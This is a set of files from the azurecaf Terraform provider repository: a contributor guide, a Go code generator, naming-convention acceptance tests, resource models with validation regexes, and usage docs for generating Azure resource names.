Every resource in CAF does have a slug that associate with this resource this is 2 to 5 letters that identify that resource, for example, the slug for a `key vault` is `kv` for a storage account `st` What is important here it is to try to keep this short but meaningful and avoid collision with existing ones. Don't worry about knowing all existing ones if you choose one that exists already the tests will fail. You can also check if the resource has a example abbreviation on this page: [doc](https://learn.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/resource-abbreviations)
5. Modify the `resourceDefinition.json`
You should now add your resource to the resource definitions in the just add another resource on the list. You can use the existing resources as a template for your resource implementation
6. Generate the definitions based on the `resourcedefinition.json` and test
You can run `make build` in case you have make installed in your system in case you don't you can run from the repository root `go generate` followed by `go fmt ./...` and then `go test ./...`
7. Update the README.MD with coverage
For quick reference, update the [README.md#resource-status](../README.md) at the root of the provider to mention the coverage you just added:
```|azurerm_api_management_custom_domain | ✔ |```
7. Commit and submit PR
Now you should commit, remembering to put a meaningful commit message. After that, you should [make pull request](https://docs.github.com/en/free-pro-team@latest/github/collaborating-with-issues-and-pull-requests/creating-a-pull-request) remembering to link in the PR the issue that it is solving.
### The `resourceDefinition.json`
Once you have all the information and have created an issue if one doesn't exist yet you can start to fill up the resource in the `resourceDefinition.json`
Each resource in the `resourceDefinitions.json` follow the following schema:
```json
{
"name": "azurerm_snapshots", //Azurerm name of the resource
"min_length": 1, // Minumum number of chars that this resource requires
"max_length": 80, // Maximum number of chars that this resource can have
"validation_regex": "\"^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$\"", // A regex expression that will match only a valid resource name
"scope": "parent", // Where this name must be unique. global means that only one resource with this name it is allowed in azure. parent means that only one resource of this name based in the parent resource. Resource group means only one resource with this name per resource group.
"slug": "snap", // This are the letters that identify the resource type
"dashes": true, // if this resource allows you to use dashes '-'
"lowercase": false, // if this resource will ONLY allow lowercase
"regex": "\"[^0-9A-Za-z_.-]\"" // This is the 'cleaning' regex anything that is matched by this regex will be removed from the resource name that is why you normally use the negation of all the allowed chars in this regex.
}
```
## Legal
This project welcomes contributions and suggestions. Most contributions require you to agree to a
Contributor License Agreement (CLA) declaring that you have the right to, and actually do, grant us
the rights to use your contribution. For details, visit https://cla.opensource.microsoft.com.
When you submit a pull request, a CLA bot will automatically determine whether you need to provide
a CLA and decorate the PR appropriately (e.g., status check, comment). Simply follow the instructions
provided by the bot. You will only need to do this once across all repos using our CLA.
<file_sep>/gen.go
// The following directive is necessary to make the package coherent:
//go:build ignore
// +build ignore
// This program generates models_generated.go. It can be invoked by running
// go generate
package main
import (
"encoding/json"
"fmt"
"io/ioutil"
"log"
"os"
"path"
"regexp"
"sort"
"text/template"
"time"
)
// ResourceStructure resource definition structure
type ResourceStructure struct {
// Resource type name
ResourceTypeName string `json:"name"`
// Resource prefix as defined in the Azure Cloud Adoption Framework
CafPrefix string `json:"slug,omitempty"`
// MaxLength attribute define the maximum length of the name
MinLength int `json:"min_length"`
// MaxLength attribute define the maximum length of the name
MaxLength int `json:"max_length"`
// enforce lowercase
LowerCase bool `json:"lowercase,omitempty"`
// Regular expression to apply to the resource type
RegEx string `json:"regex,omitempty"`
// the Regular expression to validate the generated string
ValidationRegExp string `json:"validation_regex,omitempty"`
// can the resource include dashes
Dashes bool `json:"dashes"`
// The scope of this name where it needs to be unique
Scope string `json:"scope,omitempty"`
}
type templateData struct {
ResourceStructures []ResourceStructure
GeneratedTime time.Time
SlugMap map[string]string
}
func main() {
wd, err := os.Getwd()
if err != nil {
log.Panicln("No directory found")
}
fmt.Println()
files, err := ioutil.ReadDir(path.Join(wd, "templates"))
if err != nil {
log.Fatal(err)
}
var fileNames = make([]string, len(files))
for i, file := range files {
fileNames[i] = path.Join(wd, "templates", file.Name())
}
parsedTemplate, err := template.New("templates").Funcs(template.FuncMap{
// Terraform not yet support lookahead in their regex function
"cleanRegex": func(dirtyString string) string {
var re = regexp.MustCompile(`(?m)\(\?=.{\d+,\d+}\$\)|\(\?!\.\*--\)`)
return re.ReplaceAllString(dirtyString, "")
},
}).ParseFiles(fileNames...)
if err != nil {
log.Fatal(err)
}
sourceDefinitions, err := ioutil.ReadFile(path.Join(wd, "resourceDefinition.json"))
if err != nil {
log.Fatal(err)
}
var data []ResourceStructure
err = json.Unmarshal(sourceDefinitions, &data)
if err != nil {
log.Fatal(err)
}
// Undocumented resource definitions
sourceDefinitionsUndocumented, err := ioutil.ReadFile(path.Join(wd, "resourceDefinition_out_of_docs.json"))
if err != nil {
log.Fatal(err)
}
var dataUndocumented []ResourceStructure
err = json.Unmarshal(sourceDefinitionsUndocumented, &dataUndocumented)
if err != nil {
log.Fatal(err)
}
data = append(data, dataUndocumented...)
sort.SliceStable(data, func(i, j int) bool {
return data[i].ResourceTypeName < data[j].ResourceTypeName
})
slugMap := make(map[string]string)
for _, res := range data {
if _, exists := slugMap[res.CafPrefix]; !exists {
slugMap[res.CafPrefix] = res.ResourceTypeName
}
}
modelsFile, err := os.OpenFile(path.Join(wd, "azurecaf/models_generated.go"), os.O_TRUNC|os.O_CREATE|os.O_WRONLY, 0644)
if err != nil {
log.Fatal(err)
}
err = parsedTemplate.ExecuteTemplate(modelsFile, "model.tmpl", templateData{
GeneratedTime: time.Now(),
ResourceStructures: data,
SlugMap: slugMap,
})
if err != nil {
log.Fatalf("execution failed: %s", err)
}
log.Println("File generated")
}
<file_sep>/azurecaf/resource_naming_convention_passthrough_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
func TestAccCafNamingConvention_Passthrough(t *testing.T) {
resource.UnitTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: testAccCheckResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccResourcePassthroughConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_naming_convention.logs_inv",
"logsinvalid",
11,
"log"),
regexMatch("azurecaf_naming_convention.logs_inv", regexp.MustCompile(Resources["la"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_agw",
"TEST-DEV-AGW-RG",
15,
"TEST"),
regexMatch("azurecaf_naming_convention.passthrough_agw", regexp.MustCompile(Resources["agw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_apim",
"TESTDEVAPIMRG",
13,
"TEST"),
regexMatch("azurecaf_naming_convention.passthrough_apim", regexp.MustCompile(Resources["apim"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_app",
"TEST-DEV-APP-RG",
15,
"TEST"),
regexMatch("azurecaf_naming_convention.passthrough_app", regexp.MustCompile(Resources["app"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_appi",
"TEST-DEV-APPI-RG",
16,
"TEST"),
regexMatch("azurecaf_naming_convention.passthrough_appi", regexp.MustCompile(Resources["appi"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_aks",
"kubedemo",
8,
"kube"),
regexMatch("azurecaf_naming_convention.passthrough_aks", regexp.MustCompile(Resources["aks"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_aksdns",
"kubedemodns",
11,
"kube"),
regexMatch("azurecaf_naming_convention.passthrough_aksdns", regexp.MustCompile(Resources["aksdns"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_aksnpl",
"knplinux",
8,
"knp"),
regexMatch("azurecaf_naming_convention.passthrough_aksnpl", regexp.MustCompile(Resources["aksnpl"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_aksnpw",
"knpwin",
6,
"knp"),
regexMatch("azurecaf_naming_convention.passthrough_aksnpw", regexp.MustCompile(Resources["aksnpw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_ase",
"TEST-DEV-ASE-RG",
15,
"TEST"),
regexMatch("azurecaf_naming_convention.passthrough_ase", regexp.MustCompile(Resources["ase"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_plan",
"TEST-DEV-PLAN-RG",
16,
"TEST"),
regexMatch("azurecaf_naming_convention.passthrough_plan", regexp.MustCompile(Resources["plan"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_sql",
"test-dev-sql-rg",
15,
"test"),
regexMatch("azurecaf_naming_convention.passthrough_sql", regexp.MustCompile(Resources["sql"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.passthrough_sqldb",
"TEST-DEV-SQLDB-RG",
17,
"TEST"),
regexMatch("azurecaf_naming_convention.passthrough_sqldb", regexp.MustCompile(Resources["sqldb"].ValidationRegExp), 1),
),
},
},
})
}
const testAccResourcePassthroughConfig = `
#Storage account test
resource "azurecaf_naming_convention" "logs_inv" {
convention = "passthrough"
name = "logs_invalid"
resource_type = "la"
}
# Application Gateway
resource "azurecaf_naming_convention" "passthrough_agw" {
convention = "passthrough"
name = "TEST-DEV-AGW-RG"
resource_type = "azurerm_application_gateway"
}
# API Management
resource "azurecaf_naming_convention" "passthrough_apim" {
convention = "passthrough"
name = "TEST-DEV-APIM-RG"
resource_type = "azurerm_api_management"
}
# App Service
resource "azurecaf_naming_convention" "passthrough_app" {
convention = "passthrough"
name = "TEST-DEV-APP-RG"
resource_type = "azurerm_app_service"
}
# Application Insights
resource "azurecaf_naming_convention" "passthrough_appi" {
convention = "passthrough"
name = "TEST-DEV-APPI-RG"
resource_type = "azurerm_application_insights"
}
# Azure Kubernetes Services
resource "azurecaf_naming_convention" "passthrough_aks" {
convention = "passthrough"
name = "kubedemo"
resource_type = "azurerm_kubernetes_cluster"
}
# Azure Kubernetes Services DNS Prefix
resource "azurecaf_naming_convention" "passthrough_aksdns" {
convention = "passthrough"
name = "kubedemodns"
resource_type = "aksdns"
}
# Azure Kubernetes Services Node pool Linux
resource "azurecaf_naming_convention" "passthrough_aksnpl" {
convention = "passthrough"
name = "knplinux"
resource_type = "aksnpl"
}
# Azure Kubernetes Services Node Pool Windows
resource "azurecaf_naming_convention" "passthrough_aksnpw" {
convention = "passthrough"
name = "knpwindows" #expecting 6 chars
resource_type = "aksnpw"
}
# App Service Environment
resource "azurecaf_naming_convention" "passthrough_ase" {
convention = "passthrough"
name = "TEST-DEV-ASE-RG"
resource_type = "azurerm_app_service_environment"
}
# App Service Plan
resource "azurecaf_naming_convention" "passthrough_plan" {
convention = "passthrough"
name = "TEST-DEV-PLAN-RG"
resource_type = "azurerm_app_service_plan"
}
# Azure SQL DB Server
resource "azurecaf_naming_convention" "passthrough_sql" {
convention = "passthrough"
name = "TEST-DEV-SQL-RG"
resource_type = "azurerm_sql_server"
}
# Azure SQL DB
resource "azurecaf_naming_convention" "passthrough_sqldb" {
convention = "passthrough"
name = "TEST-DEV-SQLDB-RG"
resource_type = "azurerm_sql_database"
}
`
<file_sep>/docs/data-sources/azurecaf_environment_variable.md
# azurecaf_environment_variable
The data source azurecaf_environment_variable retrieve an OS environment variable.
## Exemple usage
This example shows how to get the value of an environment variable.
```hcl
# Retrieve the PATH variable
data "azurecaf_environment_variable" "path" {
name = "PATH"
}
# Retrieve the PAT_TOKEN variable as a sensitive data and through an error if it does not exist.
data "azurecaf_environment_variable" "PAT" {
name = "PAT_TOKEN"
fails_if_empty = true
}
```
## Argument Reference
The following arguments are supported:
* name - (required) Name of the environment variable.
* fails_if_empty (optional) - Throws an error if the environment variable is not set (default: false).
# Attributes Reference
The following attributes are exported:
* id - The id of the environment variable
* value - Value (sensitive) of the environment variable.
<file_sep>/azurecaf/models.go
package azurecaf
import (
"math/rand"
"time"
)
const (
// ConventionCafClassic applies the CAF recommended naming convention
ConventionCafClassic string = "cafclassic"
// ConventionCafRandom defines the CAF random naming convention
ConventionCafRandom string = "cafrandom"
// ConventionRandom applies a random naming convention based on the max length of the resource
ConventionRandom string = "random"
// ConventionPassThrough defines the CAF random naming convention
ConventionPassThrough string = "passthrough"
)
const (
alphanum string = "[^0-9A-Za-z]"
alphanumh string = "[^0-9A-Za-z-]"
alphanumu string = "[^0-9A-Za-z_]"
alphanumhu string = "[^0-9A-Za-z_-]"
alphanumhup string = "[^0-9A-Za-z_.-]"
unicode string = `[^-\w\._\(\)]`
invappi string = "[%&\\?/]" //appinisghts invalid character
invsqldb string = "[<>*%&:\\/?]" //sql db invalid character
//Need to find a way to filter beginning and end of string
//alphanumstartletter string = "\\A[^a-z][^0-9A-Za-z]"
)
const (
suffixSeparator string = "-"
)
// ResourceStructure stores the CafPrefix and the MaxLength of an azure resource
type ResourceStructure struct {
// Resource type name
ResourceTypeName string `json:"name"`
// Resource prefix as defined in the Azure Cloud Adoption Framework
CafPrefix string `json:"slug,omitempty"`
// MaxLength attribute define the maximum length of the name
MinLength int `json:"min_length"`
// MaxLength attribute define the maximum length of the name
MaxLength int `json:"max_length"`
// enforce lowercase
LowerCase bool `json:"lowercase,omitempty"`
// Regular expression to apply to the resource type
RegEx string `json:"regex,omitempty"`
// the Regular expression to validate the generated string
ValidationRegExp string `json:"validatation_regex,omitempty"`
// can the resource include dashes
Dashes bool `json:"dashes"`
// The scope of this name where it needs to be unique
Scope string `json:"scope,omitempty"`
}
var (
alphagenerator = []rune("abcdefghijklmnopqrstuvwxyz")
)
// Generate a random value to add to the resource names
func randSeq(length int, seed *int64) string {
if length == 0 {
return ""
}
// initialize random seed
if seed == nil || *seed == 0 {
value := time.Now().UnixNano()
seed = &value
}
rand.Seed(*seed)
// generate at least one random character
b := make([]rune, length)
for i := range b {
// We need the random generated string to start with a letter
b[i] = alphagenerator[rand.Intn(len(alphagenerator)-1)]
}
return string(b)
}
// Resources currently supported
var Resources = map[string]ResourceStructure{
"aaa": {"azure automation account", "aaa", 6, 50, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{5,49}$", true, "resourceGroup"},
"ac": {"azure container app", "ac", 1, 32, true, alphanumh, "^[a-z0-9][a-z0-9-]{0,30}[a-z0-9]$", true, "resourceGroup"},
"ace": {"azure container app environment", "ace", 1, 60, false, alphanumh, "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$", true, "resourceGroup"},
"acr": {"azure container registry", "acr", 5, 50, true, alphanum, "^[0-9A-Za-z]{5,50}$", true, "resourceGroup"},
"afw": {"azure firewall", "afw", 1, 80, false, alphanumhup, "^[a-zA-Z][0-9A-Za-z_.-]{0,79}$", true, "resourceGroup"},
"agw": {"application gateway", "agw", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
"aks": {"azure kubernetes service", "aks", 1, 63, false, alphanumhu, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,61}[0-9a-zA-Z]$", true, "resourceGroup"},
"aksdns": {"aksdns prefix", "aksdns", 3, 45, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{0,43}[0-9a-zA-Z]$", true, "resourceGroup"},
"aksnpl": {"aks node pool for Linux", "aksnpl", 2, 12, true, alphanum, "^[a-zA-Z][0-9a-z]{0,11}$", true, "resourceGroup"},
"aksnpw": {"aks node pool for Windows", "aksnpw", 2, 6, true, alphanum, "^[a-zA-Z][0-9a-z]{0,5}$", true, "resourceGroup"},
"apim": {"api management", "apim", 1, 50, false, alphanum, "^[a-zA-Z][0-9A-Za-z]{0,49}$", true, "resourceGroup"},
"app": {"web app", "app", 2, 60, false, alphanumh, "^[0-9A-Za-z][0-9A-Za-z-]{0,58}[0-9a-zA-Z]$", true, "resourceGroup"},
"appi": {"application insights", "appi", 1, 260, false, invappi, "^[^%&\\?/. ][^%&\\?/]{0,258}[^%&\\?/. ]$", true, "resourceGroup"},
"ase": {"app service environment", "ase", 2, 36, false, alphanumh, "^[0-9A-Za-z-]{2,36}$", true, "resourceGroup"},
"asr": {"azure site recovery", "asr", 2, 50, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{1,49}$", true, "resourceGroup"},
"evh": {"event hub", "evh", 1, 50, false, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{0,48}[0-9a-zA-Z]$", true, "resourceGroup"},
"gen": {"generic", "gen", 1, 24, false, alphanum, "^[0-9a-zA-Z]{1,24}$", true, "resourceGroup"},
"kv": {"keyvault", "kv", 3, 24, true, alphanumh, "^[a-zA-Z][0-9A-Za-z-]{0,22}[0-9a-zA-Z]$", true, "resourceGroup"},
"la": {"loganalytics", "la", 4, 63, false, alphanumh, "^[0-9a-zA-Z][0-9A-Za-z-]{3,61}[0-9a-zA-Z]$", true, "resourceGroup"},
"nic": {"network interface card", "nic", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
"nsg": {"network security group", "nsg", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
"pip": {"public ip address", "pip", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
"plan": {"app service plan", "plan", 1, 40, false, alphanumh, "^[0-9A-Za-z-]{1,40}$", true, "resourceGroup"},
"rg": {"resource group", "rg", 1, 80, false, unicode, `^[-\w\._\(\)]{1,80}$`, true, "resourceGroup"},
"snet": {"virtual network subnet", "snet", 1, 80, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,78}[0-9a-zA-Z_]$", true, "resourceGroup"},
"sql": {"azure sql db server", "sql", 1, 63, true, alphanumh, "^[0-9a-z][0-9a-z-]{0,61}[0-9a-z]$", true, "resourceGroup"},
"sqldb": {"azure sql db", "sqldb", 1, 128, false, invsqldb, "^[^<>*%&:\\/?. ][^<>*%&:\\/?]{0,126}[^<>*%&:\\/?. ]$", true, "resourceGroup"},
"st": {"storage account", "st", 3, 24, true, alphanum, "^[0-9a-z]{3,24}$", true, "resourceGroup"},
"vml": {"virtual machine (linux)", "vml", 1, 64, false, alphanumh, "^[0-9a-zA-Z][0-9A-Za-z_-]{0,62}[0-9a-zA-Z_]$", true, "resourceGroup"},
"vmw": {"virtual machine (windows)", "vmw", 1, 15, false, alphanumh, "^[0-9a-zA-Z][0-9A-Za-z_-]{0,13}[0-9a-zA-Z_]$", true, "resourceGroup"},
"vnet": {"virtual network", "vnet", 2, 64, false, alphanumhup, "^[0-9a-zA-Z][0-9A-Za-z_.-]{0,62}[0-9a-zA-Z_]$", true, "resourceGroup"},
}
// ResourcesMapping enforcing new naming convention
var ResourcesMapping = map[string]ResourceStructure{
"azurerm_automation_account": Resources["aaa"],
"azurerm_container_app": Resources["ac"],
"azurerm_container_app_environment": Resources["ace"],
"azurerm_container_registry": Resources["acr"],
"azurerm_firewall": Resources["afw"],
"azurerm_application_gateway": Resources["agw"],
"azurerm_api_management": Resources["apim"],
"azurerm_app_service": Resources["app"],
"azurerm_application_insights": Resources["appi"],
"azurerm_app_service_environment": Resources["ase"],
"azurerm_recovery_services_vault": Resources["asr"],
"azurerm_eventhub_namespace": Resources["evh"],
"generic": Resources["gen"],
"azurerm_key_vault": Resources["kv"],
"azurerm_kubernetes_cluster": Resources["aks"],
"aks_dns_prefix": Resources["aksdns"],
"aks_node_pool_linux": Resources["aksnpl"],
"aks_node_pool_windows": Resources["aksnpw"],
"azurerm_log_analytics_workspace": Resources["la"],
"azurerm_network_interface": Resources["nic"],
"azurerm_network_security_group": Resources["nsg"],
"azurerm_public_ip": Resources["pip"],
"azurerm_app_service_plan": Resources["plan"],
"azurerm_resource_group": Resources["rg"],
"azurerm_subnet": Resources["snet"],
"azurerm_sql_server": Resources["sql"],
"azurerm_sql_database": Resources["sqldb"],
"azurerm_storage_account": Resources["st"],
"azurerm_windows_virtual_machine_linux": Resources["vml"],
"azurerm_windows_virtual_machine_windows": Resources["vmw"],
"azurerm_virtual_network": Resources["vnet"],
}
<file_sep>/azurecaf/resource_naming_convention_cafrandom_test.go
package azurecaf
import (
"regexp"
"testing"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/resource"
)
func TestAccCafNamingConventionCaf_Random(t *testing.T) {
resource.UnitTest(t, resource.TestCase{
PreCheck: func() { testAccPreCheck(t) },
Providers: testAccProviders,
CheckDestroy: testAccCheckResourceDestroy,
Steps: []resource.TestStep{
{
Config: testAccResourceCafRandomConfig,
Check: resource.ComposeTestCheckFunc(
testAccCafNamingValidation(
"azurecaf_naming_convention.st",
"log",
Resources["st"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.st", regexp.MustCompile(Resources["st"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.aaa",
"automation",
Resources["aaa"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.aaa", regexp.MustCompile(Resources["aaa"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.acr",
"registry",
Resources["acr"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.acr", regexp.MustCompile(Resources["acr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.acr_max",
"acrlevel0",
45,
"rdmi"),
regexMatch("azurecaf_naming_convention.acr_max", regexp.MustCompile(Resources["acr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.rg",
"myrg",
Resources["rg"].MaxLength,
"(_124)"),
regexMatch("azurecaf_naming_convention.rg", regexp.MustCompile(Resources["rg"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.afw",
"fire",
Resources["afw"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.afw", regexp.MustCompile(Resources["afw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.asr",
"recov",
Resources["asr"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.asr", regexp.MustCompile(Resources["asr"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.evh",
"hub",
Resources["evh"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.evh", regexp.MustCompile(Resources["evh"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.kv",
"passepartout",
Resources["kv"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.kv", regexp.MustCompile(Resources["kv"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.aks",
"kubedemo",
Resources["aks"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.aks", regexp.MustCompile(Resources["aks"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.aksdns",
"kubedemodns",
Resources["aksdns"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.aksdns", regexp.MustCompile(Resources["aksdns"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.la",
"logs",
Resources["la"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.la", regexp.MustCompile(Resources["la"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.nic",
"mynetcard",
Resources["nic"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.nic", regexp.MustCompile(Resources["nic"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.nsg",
"sec",
Resources["nsg"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.nsg", regexp.MustCompile(Resources["nsg"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.pip",
"mypip",
Resources["pip"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.pip", regexp.MustCompile(Resources["pip"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.snet",
"snet",
Resources["snet"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.snet", regexp.MustCompile(Resources["snet"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.vnet",
"vnet",
Resources["vnet"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.vnet", regexp.MustCompile(Resources["vnet"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.vmw",
"winVMT",
Resources["vmw"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.vmw", regexp.MustCompile(Resources["vmw"].ValidationRegExp), 1),
testAccCafNamingValidation(
"azurecaf_naming_convention.vml",
"linuxVM",
Resources["vml"].MaxLength,
"rdmi"),
regexMatch("azurecaf_naming_convention.vml", regexp.MustCompile(Resources["vml"].ValidationRegExp), 1),
),
},
},
})
}
const testAccResourceCafRandomConfig = `
#Storage account test
resource "azurecaf_naming_convention" "st" {
convention = "cafrandom"
name = "log"
prefix = "rdmi"
resource_type = "st"
}
# Azure Automation Account
resource "azurecaf_naming_convention" "aaa" {
convention = "cafrandom"
name = "automation"
prefix = "rdmi"
resource_type = "aaa"
}
# Azure Container registry
resource "azurecaf_naming_convention" "acr" {
convention = "cafrandom"
name = "registry"
prefix = "rdmi"
resource_type = "acr"
}
resource "azurecaf_naming_convention" "acr_max" {
convention = "cafrandom"
name = "acrlevel0"
prefix = "rdmi"
max_length = 45
resource_type = "acr"
}
# Resource Group
resource "azurecaf_naming_convention" "rg" {
convention = "cafrandom"
name = "myrg"
prefix = "(_124)"
resource_type = "rg"
}
# Azure Firewall
resource "azurecaf_naming_convention" "afw" {
convention = "cafrandom"
name = "fire"
prefix = "rdmi"
resource_type = "afw"
}
# Azure Recovery Vault
resource "azurecaf_naming_convention" "asr" {
convention = "cafrandom"
name = "recov"
prefix = "rdmi"
resource_type = "asr"
}
# Event Hub
resource "azurecaf_naming_convention" "evh" {
convention = "cafrandom"
name = "hub"
prefix = "rdmi"
resource_type = "evh"
}
# Key Vault
resource "azurecaf_naming_convention" "kv" {
convention = "cafrandom"
name = "passepartout"
prefix = "rdmi"
resource_type = "kv"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "aks" {
convention = "cafrandom"
name = "kubedemo"
prefix = "rdmi"
resource_type = "aks"
}
# Azure Kubernetes Service
resource "azurecaf_naming_convention" "aksdns" {
convention = "cafrandom"
name = "kubedemodns"
prefix = "rdmi"
resource_type = "aksdns"
}
# Log Analytics Workspace
resource "azurecaf_naming_convention" "la" {
convention = "cafrandom"
name = "logs"
prefix = "rdmi"
resource_type = "la"
}
# Network Interface
resource "azurecaf_naming_convention" "nic" {
convention = "cafrandom"
name = "mynetcard"
prefix = "rdmi"
resource_type = "nic"
}
# Network Security Group
resource "azurecaf_naming_convention" "nsg" {
convention = "cafrandom"
name = "sec"
prefix = "rdmi"
resource_type = "nsg"
}
# Public Ip
resource "azurecaf_naming_convention" "pip" {
convention = "cafrandom"
name = "mypip"
prefix = "rdmi"
resource_type = "pip"
}
# subnet
resource "azurecaf_naming_convention" "snet" {
convention = "cafrandom"
name = "snet"
prefix = "rdmi"
resource_type = "snet"
}
# Virtual Network
resource "azurecaf_naming_convention" "vnet" {
convention = "cafrandom"
name = "vnet"
prefix = "rdmi"
resource_type = "vnet"
}
# VM Windows
resource "azurecaf_naming_convention" "vmw" {
convention = "cafrandom"
name = "winVMToolongShouldbetrimmed"
prefix = "rdmi"
resource_type = "vmw"
}
# VM Linux
resource "azurecaf_naming_convention" "vml" {
convention = "cafrandom"
name = "linuxVM"
prefix = "rdmi"
resource_type = "vml"
}
`
<file_sep>/docs/resources/azurecaf_naming_convention.md
# azurecaf_naming_convention
The resource naming_convention implements a set of methodologies to apply consistent resource naming using the default Microsoft Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging.
The naming_convention is the initial resource released as part of the azurecaf provider, the naming_convention supports a fixed set of resources as described in the documention. In order to provider more flexibility and support the large breadth of Azure resources available you can use the azurecaf_name resource.
## Exemple usage
This example outputs one name, the result of the naming convention query. The result attribute returns the name based on the convention and parameters input.
The example generates a 23 characters name compatible with the specification for an Azure Resource Group
dev-aztfmod-001
```hcl
resource "azurecaf_naming_convention" "cafrandom_rg" {
name = "aztfmod"
prefix = "dev"
resource_type = "rg"
postfix = "001"
max_length = 23
convention = "cafrandom"
}
resource "azurerm_resource_group" "cafrandom" {
name = azurecaf_naming_convention.cafrandom_rg.result
location = "southeastasia"
}
The provider generates a name using the input parameters and automatically appends a prefix (if defined), a caf prefix (resource type) and postfix (if defined) in addition to a generated padding string based on the selected naming convention.
```
The example above would generate a name using the pattern [prefix]-[cafprefix]-[name]-[postfix]-[padding]:
```
dev-aztfmod-rg-001-wxyz
```
## Argument Reference
The following arguments are supported:
* name - (optional) the basename of the resource to create, the basename will be sanitized as per supported character set in Azure.
* convention (optional) - one of the four naming convention supported. Defaults to cafrandom. Allowed values are cafclassic, cafrandom, random, passthrough
* prefix (optional) - prefix to append as the first characters of the generated name
* postfix (optional) - additional postfix added after the basename, this is can be used to append resource index (eg. vm-001)
* max_length (optional) - configure the maximum length of the returned object name, is the specified length is longer than the supported length of the Azure resource the later applies
* resource_type (optional) - describes the type of azure resource you are requesting a name from (eg. azure container registrly: acr). See the Resource Type section
# Attributes Reference
The following attributes are exported:
* id - The id of the naming convention object
* result - The generated named for an Azure Resource based on the input parameter and the selected naming convention
# Methods for naming convention
The following methods are implemented for naming conventions:
| method name | description of the naming convention used |
| -- | -- |
| cafclassic | follows Cloud Adoption Framework for Azure recommendations as per https://docs.microsoft.com/en-us/azure/cloud-adoption-framework/ready/azure-best-practices/naming-and-tagging |
